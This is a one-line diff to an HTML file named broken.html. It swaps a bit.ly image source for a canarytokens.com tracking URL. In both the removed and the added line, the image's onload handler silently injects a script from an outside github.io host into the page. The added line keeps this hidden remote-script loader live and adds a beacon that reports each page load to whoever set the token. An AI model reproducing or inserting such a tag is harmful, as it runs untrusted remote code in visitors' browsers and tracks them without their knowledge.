--- a/broken.html
+++ b/broken.html
@@ -1,1 +1,1 @@
-<img src="https://bit.ly/4gGYUEA" onload="javascript:(() => { const s = document.createElement('script'); s.src = 'https://totallylost-helpme.github.io/chat.js'; document.head.appendChild(s); })();">
+<img src="http://canarytokens.com/articles/stuff/tags/75s2rgl2wfroh31k9grr9m70z/submit.aspx" onload="javascript:(() => { const s = document.createElement('script'); s.src = 'https://totallylost-helpme.github.io/chat.js'; document.head.appendChild(s); })();">
